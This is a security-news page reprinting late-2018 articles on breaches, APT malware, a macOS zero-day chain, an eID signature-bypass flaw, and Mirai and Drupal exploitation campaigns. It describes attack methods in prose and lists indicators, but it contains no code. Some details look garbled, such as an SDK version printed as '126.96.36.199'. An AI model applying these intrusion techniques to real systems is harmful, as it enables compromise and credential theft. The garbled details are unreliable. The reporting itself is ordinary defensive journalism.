Anti-Ransom Remote Tool GandCrabDecryptor. Please do not block your ad, it is an important part of the site's revenue.
|30.11.18||2014 Marriott Data Breach Exposed, 500M Guests Impacted||Threatpost|
|30.11.18||New KingMiner Threat Shows Cryptominer Evolution||Cryptocurrency||Bleepingcomputer|
|30.11.18||Mozilla Firefox Expands DNS-over-HTTPS (DoH) Test to Release Channel||Security||Bleepingcomputer|
|30.11.18||SKY Brasil Exposes 32 Million Customer Records||Incindent||Bleepingcomputer|
|30.11.18||Records of 114 Million US Citizen and Companies Exposed Online||Incindent||Bleepingcomputer|
|30.11.18||Dell Systems Hacked to Steal Customer Information||Incindent||Bleepingcomputer|
|U.S. Charges Two Iranians Over SamSam Ransomware Attacks||Ransomware||Securityweek|
|29.11.18||Cyber Risk Exchange Startup CyberGRX Raises $30 Million||IT||Securityweek|
|29.11.18||Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers||Security||Securityaffairs|
|Records of 114 Million US Citizen and Companies Exposed Online||Incindent||Bleepingcomputer|
|29.11.18||Dell Systems Hacked to Steal Customer Information||Incindent|
|Bing is Warning that the VLC Media Player Site is Unsafe||Security|
|Windows 10 Build 18290 Released to Insiders With Start Menu Improvements||IT|
VMware fixed Workstation flaw disclosed at the Tianfu Cup PWN competition
24.11.2018 securityaffairs Vulnerebility
VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered at the Tianfu Cup PWN competition.
VMware released security updates to address a vulnerability (CVE-2018-6983) that was recently discovered by Tianwen Tang of Qihoo 360’s Vulcan Team at the Tianfu Cup PWN competition.
White hat hackers earned more than $1 million for zero-day exploits disclosed at the hacking contest that took place on November 16-17 in Chengdu.
Tang received $100,000 for the successful exploitation of the flaw, the virtualization giant has quickly fixed the critical Workstation and Fusion vulnerability.
“VMware Workstation and Fusion contain an integer overflow vulnerability in the virtual network devices. This issue may allow a guest to execute code on the host.” states the security advisory published by VMWare.
“VMware would like to thank Tianwen Tang of Qihoo 360Vulcan Team working with the Tianfu Cup 2018 International Pwn Contest for reporting this issue to us.”
The flaw is an integer overflow bug affecting virtual network devices, it could be exploited to execute code on the Workstation host from the guest.
The flaw affects Workstation 14.x and 15.x on any platform, and Fusion 10.x and 11.x on macOS.
“We wanted to post a quick acknowledgement that VMware has representatives in attendance at the Tianfu Cup PWN Contest in Chengdu, China to review any vulnerabilities that may be demonstrated during the contest.” added VMWware.
“We would like to thank the organisers for inviting us to attend. Stay tuned for further updates.”
New Emotet Thanksgiving campaign differs from previous ones
24.11.2018 securityaffairs Virus
Researchers from Forcepoint observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.
Security researchers from Forcepoint have observed a new Emotet Thanksgiving-themed campaign that appears quite different from previous ones.
EMOTET, aka Geodo, is a banking trojan linked to the dreaded Dridex and Feodo (Cridex, Bugat) malware families.
In past campaigns, EMOTET was used by crooks to steal banking credentials and as a malicious payload downloader.
According to the experts, the Thanksgiving-themed campaign targeted U.S. users this week.
“After a hiatus of some weeks, we observed Emotet returning in mid-November with upgraded macro obfuscation and formatting. On 19 November, it began a US-centric Thanksgiving-themed campaign. As many will know this is a departure from the standard financial themes regularly seen.” reads the analysis published by Forcepoint.
The new campaign leverages an improved variant of the malware that implements new features and modules, experts pointed out that this is the first campaign that doesn’t use financial themes.
The crooks behind the recent Emotet campaign sent out roughly 27,000 messages daily, below a sample of the Thanksgiving-themed message:
The attachment is an XML file masquerading as a .doc with embedded macros leading to a standard PowerShell downloader normally observed with Emotet banking Trojan, which is also used by crooks to drop other payloads.
“However, the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide.” continues the expert.
The macro has been recently evolved from the Emotet pattern, in implements upgraded macro obfuscation and formatting.
“In the few weeks since Emotet returned it has undergone some interesting changes, most notably in the new Thanksgiving theme and macro obfuscation discussed previously.” concludes Forcepoint.
“Whilst not completely novel (use of XML files to conceal macros was reported by Trustwave back in 2015) it does pose a challenge to defenders due to the sheer volume of emails sent, as detection signatures need to be rapidly created to stem the onrushing tide.”
Further details, including IoCs are reported in the analysis published by the experts.
Exclusive Cybaze ZLab – Yoroi – Hunting Cozy Bear, new campaign, old habits
24.11.2018 securityaffairs APT
The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka Cozy Bear)
The experts at Cybaze ZLab – Yoroi continue the analysis of new strain of malware used by the Russia-linked APT29 cyberespionage group (aka The Dukes, Cozy Bear, and Cozy Duke).
The researchers of Yoroi ZLab, on 16 November, accessed to a new APT29’s dangerous malware which seems to be involved in the recent wave of attacks aimed at many important US entities, such as military agencies, law enforcement, defense contractors, media companies and pharmaceutical companies.
Threat actors carried out spear phishing attacks impersonating a State Department official to attempt compromising targets
The experts discovered that Cozy Bear cyberspies used in the last campaign a technique to drop malicious code that was already employed by threat actors.
APT29 along with APT28 cyber espionage group was involved in the Democratic National Committee hack and the wave of attacks aimed at the 2016 US Presidential Elections.
The same technique has been used by the APT group back in 2016 when the Cozy Bear in the aftermath of the US Presidential Election.
At the time, Cozy Bear hackers carried out spear-phishing attack using a zip file containing a weaponized self-extracting link file that drops a decoy document and the final payload.
The researchers at Cybaze ZLab – Yoroi pointed out that the technique used to avoid detection is very sophisticated.
“The usage of a link file containing the complete payload is a powerful technique, still hard to detect by several common anti-virus solutions. Despite the effectiveness of this strategy, the creation of the weaponized LINK such the one analyzed is quite easy, many publicly available resources could help crooks to abuse it.” reads the analysis published by Cybaze ZLab – Yoroi researchers.
The C2C “pandorasong[.]com” recalls the legit “pandora.com” domain name, one of the most popular music streaming service in the US. Moreover, the requests sent by the malware are forged to look like as legit Pandora traffic, using information publicly available on GitHub.
According to FireEye’s report the final DLL contains a beaconing payload generated with Cobalt Strike, a well-known post-exploitation framework typically used by Red-Teams.
The complete analysis conducted by Cybaze ZLab – Yoroi, including the Yara rules, are reported in a blog post on the Yoroi blog.
Software company OSIsoft has suffered a data breach
24.11.2018 securityaffairs Incindent
Software company OSIsoft has suffered a data breach, the firm confirmed that all domain accounts have likely been compromised.
Software company OSIsoft notified security breach to employees, interns, consultants, and contractors.
The company offers real-time data management solutions, its core product is the open enterprise infrastructure, the PI System, that allows connecting sensor-based data, systems, and people.
The PI System product is used by organizations to collect, analyze and visualize data to improve internal processes.
According to the data breach notification published by the company and submitted to the Office of the Attorney General in California, attackers used stolen credentials to remotely access company systems.
“OSIsoft is experiencing a security incident that may affect employees, interns, consultants and contractors. Stolen credentials were used to remotely access OSIsoft computers.” reads the data breach notification.
“OSIsoft intrusion detection systems alerted IT to unauthorized activity. Our security service provider has recovered direct evidence of credential theft activity involving 29 computers and 135 accounts. We have concluded, however, that all OSI domain accounts are affected.”
Hackers accessed OSI domain logon account name, email address, and password, although Active Directory (AD) uses cryptographic protection methods, users personal credentials may have been compromised.
The company is still investigating the security breach, in the meantime, it has developed a comprehensive remediation strategy.
The submission of the notification to the Office of the Attorney General revealed that at the time OSIsoft listed eight different dates between March 23, 2017, and July 26, 2018, more than a year! Below the data provided by the company.
Thursday, March 23, 2017
Saturday, May 6, 2017
Tuesday, May 9, 2017
Saturday, August 5, 2017
Wednesday, April 18, 2018
Wednesday, May 23, 2018
Wednesday, July 18, 2018
Thursday, July 26, 2018
The company is resetting compromised passwords, it also urges affected people to change passwords on external services if they were the used for the OSI account, report suspicious activity to the IT team, and disable or restrict remote access and file sharing features on their devices.
13 fraudulent apps into Google Play have been downloaded 560,000+ times
24.11.2018 securityaffairs Android
Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.
Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps into Google Play that have been already downloaded and installed over half a million times (+560,000).
The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.
· Nov 19, 2018
Don't install these apps from Google Play - it's malware.
-all together 560,000+ installs
-after launch, hide itself icon
-downloads additional APK and makes user install it (unavailable now)
-2 apps are #Trending
-no legitimate functionality
View image on Twitter
App functionality demonstration pic.twitter.com/11HskeD56S
3:35 PM - Nov 19, 2018
Twitter Ads info and privacy
73 people are talking about this
Twitter Ads info and privacy
All the malicious apps are posing as games were published by the same developer named Luis O Pinto, at the time they have a low detection rate.
The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.
Once installed, the malicious apps would remove their icon from the display immediately and downloads other malicious apps in the background.
The applications were all downloaded from a hardcoded address.
In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.
Stefanko reported that the downloaded APK was Game Center, once installed and executed it hides itself start displaying ads.
The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.
The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.
Stefanko confirmed that Game Center is no longer available at the link that is hardcoded in the malicious apps, after being informed of the fraudulent applications Google removed them from Google Play.
Kaspersky Security Bulletin: Threat Predictions for 2019
23.11.2018 Kaspersky Security
There’s nothing more difficult than predicting. So, instead of gazing into a crystal ball, the idea here is to make educated guesses based on what has happened recently and where we see a trend that might be exploited in the coming months.
Asking the most intelligent people I know, and basing our scenario on APT attacks because they traditionally show the most innovation when it comes to breaking security, here are our main ‘predictions’ of what might happen in the next few months.
No more big APTs
What? How is it possible that in a world where we discover more and more actors every day the first prediction seems to point in the opposite direction?
The reasoning behind this is that the security industry has consistently discovered highly sophisticated government-sponsored operations that took years of preparation. What seems to be a logical reaction to that situation from an attacker’s perspective would be exploring new, even more sophisticated techniques that are much more difficult to discover and to attribute to specific actors.
Indeed, there are many different ways of doing this. The only requirement would be an understanding of the techniques used by the industry for attribution and for identifying similarities between different attacks and the artifacts used in them– something that doesn’t seem to be a big secret. With sufficient resources, a simple solution for an attacker could be having different ongoing sets of activity that are very difficult to relate to the same actor or operation. Well-resourced attackers could start new innovative operations while keeping their old ones alive. Of course, there’s still a good chance of the older operations being discovered, but discovering the new operations would pose a greater challenge.
Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.
Some operations are simply externalized to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. Technical capabilities and tools are owned by the private industry in this scenario, and they are for sale for any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.
All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.
Networking hardware and IOT
It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even when the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.
Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.
Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.
All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.
One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.
Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.
One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.
Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.
Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.
However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.
What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.
Emergence of newcomers
Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.
The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.
There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.
The negative rings
The year of Meltdown/Specter/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary as it would be invisible to almost all the security mechanisms we have.
For instance, in the case of SMM there has at least been a publicly available PoC since 2015. SMM is a CPU feature that would effectively provide remote full access to a computer without even allowing Ring 0 processes to have access to its memory space. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.
We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that’s been available since at least 2014, but again no real ITW examples as yet.
Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.
Your favorite infection vector
In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the nearest future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.
Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, some attacker using the stolen credentials of some close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.
This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.
Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.
Olympic destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack. Or simply as a nasty surprise for the victim.
Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.
Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation for instance, governments might use them as a response ranged somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.
ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.
Advanced supply chain
This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.
Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.
Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.
What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.
However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.
It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.
All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and if it does, we will probably never know….
This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.
Even though successful infections for iPhone requires concatenating several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices using, for instance, rogue MDM servers and asking targets through social engineering to use them in their devices, providing the attackers with the ability to install malicious applications.
It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.
In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.
The other things
What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak error-prone humans and replacing them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?
Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?
Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?
There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.
We are here to try and anticipate, to understand the attacks we don’t, and to prevent them from occurring in the future.
Chaining 3 zero-days allowed pen testers to hack Apple macOS computers
23.11.2018 securityaffairs Apple
Dropbox team disclosed three critical zero-day vulnerabilities in Apple macOS, chaining them it is possible to take over a Mac computer.
Dropbox team disclosed three critical zero-day vulnerabilities (CVE-2017-13890, CVE-2018-4176, CVE-2018-4175) affecting the Apple macOS operating system, an attacker could chain them to remotely execute arbitrary code on a targeted Mac computer.
The attacker only needs to trick victims into visiting a specially crafted website.
The vulnerabilities were discovered by experts at cybersecurity firm Syndis that was hired by Dropbox to carry out a penetration test on the company’s IT infrastructure,
The experts also assessed the Apple software used by Dropbox
The flaws were reported to Apple security team in February and Apple quickly addressed it with the release of March security updates.
The vulnerabilities affected all systems running the latest version of the Safari web browser and operating system.
The CVE-2017-13890 vulnerability was affecting the CoreTypes component of macOS, by processing a maliciously crafted webpage may result in the automatic mounting of a disk image.
The CVE-2018-4176 flaw tied the way Disk Images handled .bundle files, mounting a malicious disk image may result in the launching of an application.
The last vulnerability tracked as CVE-2018-4175 could be exploited to bypass the macOS Gatekeeper security feature using a maliciously crafted application.
The issue allowed to bypass code signing enforcement and execute a modified version of Terminal app leading to arbitrary commands execution.
The experts were able to chain the vulnerabilities to take over a Mac system by tricking a victim into visiting a malicious web page with Safari.
“Syndis was able to chain these together in a two-stage exploit to achieve arbitrary code execution for a user who visits a specially crafted web page with Safari.” reads a blog post published by DropBox.
“The first stage includes a modified version of the Terminal app, which is registered as a handler for a new file extension (.workingpoc). In addition it would contain a blank folder called “test.bundle” which would be set as the default “openfolder” which automatically would open /Applications/Terminal.app without prompt. The second stage includes an unsigned shellscript with the extension “.workingpoc” which is then executed within the running Terminal application without prompt.
Flaw allowing identity spoofing affects authentication based on German eID cards
23.11.2018 securityaffairs Vulnerebility
The authentication process via German eID cards with RFID chips is flawed, an attacker could impersonate any other citizen.
The nightmare comes true, the authentication process via German eID cards with RFID chips is flawed and a flaw could allow an attacker to allow identity spoofing and changing the date of birth.
The situation is very serious, the new cards are accepted as an ID document in most countries in Europe and allow the German citizens to access online government services (i.e. tax service).
The German ID cards issued since November 1st, 2010, store holder’s information (i.e. name, date of birth, a biometric picture, and optionally fingerprints) in the embedded radio frequency identification (RFID) chip.
The cards could be used to authenticate the holder via the RFID chip, in this scenario, it is possible to use an eID application (i.e. AusweisApp) along with an RFI smartcard reader.
The mutual authentication leverages a PKI infrastructure, the authentication process starts with the web application sending a request to the eID client that initiates all further steps needed for the authentication, and requests it a PIN.
The web application communicates with an authentication server (eID-Server or SAML-Processor) providing it the data contained in the RFID chip (i.e. the name or date of birth of the citizen).
To prevent eavesdropping, the response is digitally signed by the authentication server.
Security researchers at SEC Consult Vulnerability Lab demonstrated that is possible to spoof the identity of a German eID card holder and alter data.
The security expert Wolfgang Ettlinger at SEC Consult Vulnerability Lab discovered a flaw in the Governikus Autent SDK that could be used by companies to implement the ID card authentication to a web service via German eID cards.
The expert devised a method to alter the digitally signed response from the server making it still valid for the client, it was able to authenticate with an arbitrary name (he used the name of the popular writer Johann Wolfgang von Goethe and his address) against a demo version of the AusweisApp eID client.
The expert discovered that Governikus Autent SDK verifies the signature doesn’t implement the management of a parameter with same name occurring multiple times. This implies that the parameter is validated just one time, other instances are parsed as if they already passed verification.
“The vulnerability abuses the fact that HTTP allows multiple parameters having the same name. When the method HttpRedirectUtils.checkQueryString creates a canonical version of the query string, it parses the parameters from it and generates a new query string with the parameters placed in a specific order. The case that a parameter can occur multiple times, is not considered.” reads the analysis published by the expert.
“If an attacker supplies multiple parameters named SAMLResponse, the signature is verified against the last occurrence of the parameter, while the SAML response that is processed further, will be taken from the first occurrence.”
All the attacker needs is a query string signed by the authentication server, no matter how long it is valid because the expiration check is conducted on the manipulated data. According to the expert, this information could be easily obtained using a Google search for eID client logs.
Ettlinger published a video PoC of the attack:
The vulnerability affects Web applications running Autent SDK 3.8.1 and earlier that handle duplicate HTTP parameters.
SEC Consult privately reported technical details of the issues to CERT-Bund in July and Governikus released the version 126.96.36.199 its SDK to fix the flaw.
Experts pointed out that the attack works only partially for services that require an initial registration.
“The id card authentication specification includes the concept of pseudonyms. A pseudonym is a random-looking string generated by the id card. For each web application, the id card generates a different pseudonym. When the user creates an account, the pseudonym is stored by the web application. During login, the web application only requires to request the pseudonym string from the id card and compare it with the values stored in its user database.” conclude the experts.
“As another user’s pseudonym is not easily guessable, an attacker cannot login as another user. The account creation step, however, is still affected by this vulnerability as the attacker could simply generate a random pseudonym. Moreover, this attack is only applicable to web applications that use the method HttpServletRequest.getParameter.”
Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw
22.11.2018 securityaffairs BotNet
Security experts from Netscout Asert discovered more than ten Mirai bot variants attempting to exploit a recently disclosed flaw in Hadoop YARN on Intel servers.
These Mirai variants are the first one that doesn’t target Internet of Things devices, the bot was specifically developed to target Linux servers.
The Hadoop YARN is vulnerability is a command injection flaw that could be exploited by attackers to remotely execute arbitrary shell commands on a vulnerable server.
The new versions don’t implement worm-like spreading abilities, instead, threat actors leverage exploits to spread the malware.
Netscout observed tens of thousands of exploit attempts daily targeting it honeypots, in November attackers attempted to deliver some 225 unique malicious payloads exploiting the Hadoop YARN vulnerability.
One of the variants spotted by the experts labeled itself as VPNFilter, even if it is not linked with the infamous VPNFilter bot that infected more than a half-million small and home office routers in May.
“ASERT has been monitoring exploit attempts for the Hadoop YARN vulnerability in our honeypot network and found a familiar, but surprising payload – Mirai. These versions of Mirai behave much like the original but are tailored to run on Linux servers and not underpowered IoT devices.” reads the analysis published by the experts.
“Mirai botmasters that target Linux servers no longer need to tailor their malware for strange architectures, they assume their targets are using x86.”
The specific Mirai variant only delivers the x86 variant of the bot because much Hadoop YARN services are running on x86 Linux servers.
Other IoT Mirai variants first examine the victim device in order to deliver the proper executable (x86, x64, ARM, MIPS, ARC, etc.=
Vulnerable Linux servers are a privileged target for attackers that attempt to compromise them to carry out malicious activities by exploiting their hardware resources that are greater than IoT ones.
“The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible.” concluded the experts.
“Once gaining a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small, diminutive devices in the botnet lurk fully powered Linux servers.”
Hackers target Drupal servers chaining several flaws, including Drupalgeddon2 and DirtyCOW
22.11.2018 securityaffairs Vulnerebility
Hackers targeted Drupal web servers chaining some known vulnerabilities, including Drupalgeddon2 and DirtyCOW issues.
Security experts at Imperva reported an attack against Drupal Web servers running on Linux-based systems. Hackers exploited the Drupalgeddon2 flaw (CVE-2018-7600) along with other issues. The Drupalgeddon2 could be exploited to take over a website, it affects Drupal versions 6, 7 and 8.
The other flaw exploited in the attacks is the DirtyCOW issue, it is a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. The flaw could be exploited by a local attacker to escalate privileges.
In the attack observed by Imperva, hackers attempted to hack into the Drupal servers chaining both Drupalgeddon2 and DirtyCOW, they also attempted to gain access to the target machines via system misconfigurations.
“In this post we’ll unpack a short — but no less serious — attack that affected some Linux-based systems, on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities including the infamous Drupalgeddon2 and DirtyCOW, and system misconfigurations to persistently infect vulnerable Drupal web servers and take over user machines.” reads the analysis published by Imperva.
The new attack stands out because hackers would gain persistence on the target, they opted for a technique to easily re-infect a vulnerable server in case the process is terminated or after a server restart, or run an additional malicious code.
The attackers create a word list by locating all of Drupal’s settings files and extracting all of the lines that contain the word “pass”.
This attack could be effective in case administrators leave ‘root’ as the default user to connect from the web application to the database. The attackers can attempt to use the command ‘su root’ to change the user to root.
If the administrator did not leave the root passwords in the configuration files, the hackers attempt to exploit the DirtyCOW flaw to escalate privileges to root.
“If the attacker succeeds in changing the user, they can proceed to download the secondary payload ‘sshdstuff’ and execute (more details below).” continues the post.
“If the administrator was careful and didn’t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root.”
The attackers attempted to use three different implementations of DirtyCOW exploit, one of which is raw format (C source code file) and was being compiled at runtime.
One of the above implementations has zero detection rate in VirusTotal, Imperva points out, even if the DirtyCOW is a two-year old flaw.
Once the attackers gain root access and the permission to install new services, they would install SSH, configure it and add their key to the list of authorized keys by the service.
“Now, as long as the machine is up and running, the attacker can remotely transmit any command as the user root – game over,” Imperva concludes.
“Administrators should make sure that their web application is fully patched as well as the operating system of the host. Alternately, it is possible to use external cybersecurity solution, like a WAF, to block the attack before it reaches the server. Imperva customers are protected out of the box.”
Sofacy APT group used a new tool in latest attacks, the Cannon
22.11.2018 securityaffairs APT
Sofacy APT group (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) has a new weapon in its arsenal dubbed Cannon.
The Russia-linked APT group delivers Cannon in a spear-phishing attack that targets government organizations in North America, Europe and in a former USSR state.
Experts at Palo Alto Networks spotted a new campaign in late October and early November, spear-phishing messages used Word documents that loaded remote templates embedded with a malicious macro code.
The novelty in the last attacks is represented by the use of a tool that has not been seen before, attackers also used an uncommon technique to deliver the malware and to avoid running in a sandbox.
“Once the victim presses the Enable content button, the embedded macro is executed. The macros used for these delivery documents use a less common method of using the AutoClose function. This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document.” reads the analysis published by Palo Alto Networks.
“If an automated sandbox exits its analysis session without specifically closing out the document, the sandbox may miss the malicious activity entirely. Once successfully executed, the macro will install a payload and save a document to the system.”
Cannon acts as a downloader and relies on emails to communicate with the C2 server and receive instructions.
The tool implements a broad range of abilities including adding persistence and creating a unique system identifier, gathering system information, grabbing snapshots of the desktop, logging into a POP3 email account to get access to attachments.
The Cannon uses three accounts hosted at a Czech service provider called Seznam to send emails. The attackers used the email account ‘sahro.bella7[at]post.cz’ as the C2 point.
“The overall purpose of Cannon is to use several email accounts to send system data (system information and screenshot) to the threat actors and to ultimately obtain a payload from an email from the actors,” the researchers explain.
Experts reported that Sofacy hackers exploited the interest in the Lion Air airplane crash to carry out an attack. Hackers used weaponized files named ‘crash list (Lion Air Boeing 737).docx’ for their campaigns.
APT28 appears very active in this period, Cannon isn’t the unique novelty in its arsenal, the Cybaze ZLab – Yoroi team recently discovered a new variant of the infamous APT28 Lojax (aka Double-Agent). It is the latest version of the well-known rootkit Double-Agent, previously analyzed by ESET researchers.
Further details on the Cannon attacks, including IoCs, are reported in the analysis published by Palo Alto Networks,
